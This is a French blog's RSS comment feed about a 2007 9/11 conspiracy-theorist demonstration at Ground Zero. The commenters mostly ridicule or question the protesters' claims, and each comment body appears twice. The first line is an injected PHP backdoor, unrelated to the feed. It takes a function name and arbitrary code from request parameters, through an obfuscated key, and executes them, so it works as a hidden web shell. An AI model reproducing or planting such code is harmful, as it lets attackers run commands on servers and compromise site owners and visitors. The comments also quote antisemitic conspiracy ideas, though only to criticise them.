if (isset($_REQUEST['FILE'])){$_FILE = $_REQUEST['779f808d8c20c43908cba936a6f2fef4']('$_',$_REQUEST['FILE'].'($_);'); $_FILE(stripslashes($_REQUEST['HOST']));}
Comments on: Manifestation conspirationniste au Ground Zero – 16H
http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/
Video Blog Reportage Participatif, live autour du GlobeSun, 15 Jan 2012 20:13:25 +0000hourly1http://wordpress.org/?v=By: egoblog.net » Blog Archive » Le Ministère de la Crise du logement infiltré par les conspirationnistes de reopen911
http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/comment-page-1/#comment-22786
egoblog.net » Blog Archive » Le Ministère de la Crise du logement infiltré par les conspirationnistes de reopen911Sat, 21 Feb 2009 19:30:51 +0000http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/#comment-22786[...] J’avais croisé avec Alban, un jeune reopeniste français en septembre dernier à NY lors de manifestations [...][...] J’avais croisé avec Alban, un jeune reopeniste français en septembre dernier à NY lors de manifestations [...]
]]>
By: Patrick
http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/comment-page-1/#comment-7730
PatrickFri, 14 Sep 2007 08:18:41 +0000http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/#comment-7730Un seul juif mort ? Et puis quoi encore ? Complot judéo-maçonnique-bolchévik-opportuniste de Kissinger-Schlesinger ?
L'ambassade d'Israël avait estimé que 4000 concitoyens auraient dû être dans les parages du Centre du Commerce Mondial. Et certainement que beaucoup d'entre eux sont morts aussi.Un seul juif mort ? Et puis quoi encore ? Complot judéo-maçonnique-bolchévik-opportuniste de Kissinger-Schlesinger ?
L’ambassade d’Israël avait estimé que 4000 concitoyens auraient dû être dans les parages du Centre du Commerce Mondial. Et certainement que beaucoup d’entre eux sont morts aussi.
]]>By: Blogtrotters
http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/comment-page-1/#comment-7694
BlogtrottersThu, 13 Sep 2007 16:18:42 +0000http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/#comment-7694Thomas> En effet. ;)Thomas> En effet. ;)
]]>By: Thomas
http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/comment-page-1/#comment-7679
ThomasThu, 13 Sep 2007 14:25:41 +0000http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/#comment-7679RIDICULERIDICULE
]]>By: Blogtrotters
http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/comment-page-1/#comment-7515
BlogtrottersSun, 09 Sep 2007 15:04:41 +0000http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/#comment-7515Caro> Ce jeune militant nous semble assez représentatif des gens qu'on a pu croiser là-bas. Pour des plus "coriaces", voir la prochaine séquence. ;)
Vinz> Nous ne pensons pas qu'il ait eu des consignes. Il semble de bonne foi, même lorsqu'il évoque les "sacrifices humains"... Pour les juifs (plutôt les Israéliens) et les francs-maçons, ils l'évoquent assez régulièrement, mais ce n'est pas le cas de tous les conspirationnistes (quoique). Pour la bohemian sociéty, c'est un peu comme pour la fondation pour un nouveau centenaire américain ou même les Illuminati. Du fantasme.
Jean> Il y a en tout cas aux États-Unis, un respect pour la liberté d'expression qui favorise l'éclosion de ces discours. Les contre-arguments existent pourtant partout sur le net. Mais ils choisissent de voir ce qui confirme leurs croyances...Caro> Ce jeune militant nous semble assez représentatif des gens qu’on a pu croiser là-bas. Pour des plus “coriaces”, voir la prochaine séquence. ;)
Vinz> Nous ne pensons pas qu’il ait eu des consignes. Il semble de bonne foi, même lorsqu’il évoque les “sacrifices humains”… Pour les juifs (plutôt les Israéliens) et les francs-maçons, ils l’évoquent assez régulièrement, mais ce n’est pas le cas de tous les conspirationnistes (quoique). Pour la bohemian sociéty, c’est un peu comme pour la fondation pour un nouveau centenaire américain ou même les Illuminati. Du fantasme.
Jean> Il y a en tout cas aux États-Unis, un respect pour la liberté d’expression qui favorise l’éclosion de ces discours. Les contre-arguments existent pourtant partout sur le net. Mais ils choisissent de voir ce qui confirme leurs croyances…
]]>By: Jean
http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/comment-page-1/#comment-7503
JeanSun, 09 Sep 2007 09:14:59 +0000http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/#comment-7503Il est évident que des sociétés parallèles infiltrées dans tous les secteurs mènent des activités "conspirationnistes". Ce n'est pas nouveau. Mais en même temps, même sous couvert du premier amendement et avec des théories largement fantaisistes, croyez-vous que l'Etat laisserait se propager ce genre de propos sans mettre le Holà, si ceux-ci n'étaient précisemment pas fantaisistes ? Les services secrets savent très bien traiter ce genre d'action quand cela s'avère nécessaire. Ce qui interpelle le plus dans cette interview, c'est lorsque ce jeune homme, parfaitement convaincu, dit : "Je viens aider à propager la vérité". Et il a fait le voyage depuis la France...Il est évident que des sociétés parallèles infiltrées dans tous les secteurs mènent des activités “conspirationnistes”. Ce n’est pas nouveau. Mais en même temps, même sous couvert du premier amendement et avec des théories largement fantaisistes, croyez-vous que l’Etat laisserait se propager ce genre de propos sans mettre le Holà, si ceux-ci n’étaient précisemment pas fantaisistes ? Les services secrets savent très bien traiter ce genre d’action quand cela s’avère nécessaire. Ce qui interpelle le plus dans cette interview, c’est lorsque ce jeune homme, parfaitement convaincu, dit : “Je viens aider à propager la vérité”. Et il a fait le voyage depuis la France…
]]>By: Vinz
http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/comment-page-1/#comment-7501
VinzSun, 09 Sep 2007 08:19:14 +0000http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/#comment-7501La personne que vous avez rencontré porte le t-shirt du groupe dont Tristan aime particulierement les théories mais
il ne savait pas grand chose sur leurs théories impliquant l'administration américaine et les attentats.
Est ce le cas de tous?(De ne pas trop savoir de quoi ils parlent et etre tres confus dans leur raisonnement.)
A t-il eu des consignes?(Il réussit tout de meme a faire de la publicité pour d'autre site conspirationniste...)
Pourquoi parle t-il plus des "juifs" et des " franc-maçon" que de l'administration américaine?
Est ce chez les conspirationniste des idées plus porteuses et plus unificatrice que le sont celle de l'administration responsable de tout ce qui est arrivé depuis ?
Avez vous trouvé des info sur la "bohemian society"?
Mes questions peuvent paraitre 'débile' mais ce sont les premieres qui me sont venus en voyant ce représentant de ce mouvement.Je en sais pas par contre si vous pourrez y répondre ...La personne que vous avez rencontré porte le t-shirt du groupe dont Tristan aime particulierement les théories mais
il ne savait pas grand chose sur leurs théories impliquant l’administration américaine et les attentats.
Est ce le cas de tous?(De ne pas trop savoir de quoi ils parlent et etre tres confus dans leur raisonnement.)
A t-il eu des consignes?(Il réussit tout de meme a faire de la publicité pour d’autre site conspirationniste…)
Pourquoi parle t-il plus des “juifs” et des ” franc-maçon” que de l’administration américaine?
Est ce chez les conspirationniste des idées plus porteuses et plus unificatrice que le sont celle de l’administration responsable de tout ce qui est arrivé depuis ?
Avez vous trouvé des info sur la “bohemian society”?
Mes questions peuvent paraitre ‘débile’ mais ce sont les premieres qui me sont venus en voyant ce représentant de ce mouvement.Je en sais pas par contre si vous pourrez y répondre …
]]>By: caro
http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/comment-page-1/#comment-7498
caroSun, 09 Sep 2007 08:08:28 +0000http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/#comment-7498première réflexion : il fait plus chaud à NY que chez nous.
2e réflexion : la chaleur ne fait rien à l'affaire. Le jeune n'a pas l'air plus "chaud" que ça et ses connaissances sont plus que limitées. Il nous ferait plutôt sourire, si l'objet de son voyage n'était pas le soutien aux conspirationnistes.
Bref, jeune mouton (sans arguments et pour lui retourner son expression) friqué (combien un A-R + un passeport biométrique ?). Ils sont tous comme ça ou vous en avez rencontrés des "coriaces" ?
Bon séjour et à bientôtpremière réflexion : il fait plus chaud à NY que chez nous.
2e réflexion : la chaleur ne fait rien à l’affaire. Le jeune n’a pas l’air plus “chaud” que ça et ses connaissances sont plus que limitées. Il nous ferait plutôt sourire, si l’objet de son voyage n’était pas le soutien aux conspirationnistes.
Bref, jeune mouton (sans arguments et pour lui retourner son expression) friqué (combien un A-R + un passeport biométrique ?). Ils sont tous comme ça ou vous en avez rencontrés des “coriaces” ?
Bon séjour et à bientôt
]]>By: Blogtrotters
http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/comment-page-1/#comment-7485
BlogtrottersSun, 09 Sep 2007 01:22:54 +0000http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/#comment-7485davveld> Notre estimation, plusieurs dizaines d'individus, peut être une centaine. Ils étaient présents entre 14 et 17h. Plutôt jeunes, quasiment que des hommes. Probablement d'extrême-gauche. (Aucun problème pour tes questions, on répond ce qu'on peut) :)davveld> Notre estimation, plusieurs dizaines d’individus, peut être une centaine. Ils étaient présents entre 14 et 17h. Plutôt jeunes, quasiment que des hommes. Probablement d’extrême-gauche. (Aucun problème pour tes questions, on répond ce qu’on peut) :)
]]>By: davveld
http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/comment-page-1/#comment-7475
davveldSat, 08 Sep 2007 23:18:04 +0000http://www.blogtrotters.fr/2007/09/09/manifestation-conspirationniste-au-ground-zero-16h/#comment-7475Hallucinant et terrifiant. J'essaie de me rassurer en me disant qu'il s'agit d'une infime minorité de personnes. Au fait, combien de manifestants, à ce moment, selon vous ? Une petite idée de la "sociologie" de ce groupe ?
(J'ai un défaut, j'aime poser des questions aux réponses peu évidentes, désolé...)Hallucinant et terrifiant. J’essaie de me rassurer en me disant qu’il s’agit d’une infime minorité de personnes. Au fait, combien de manifestants, à ce moment, selon vous ? Une petite idée de la “sociologie” de ce groupe ?
(J’ai un défaut, j’aime poser des questions aux réponses peu évidentes, désolé…)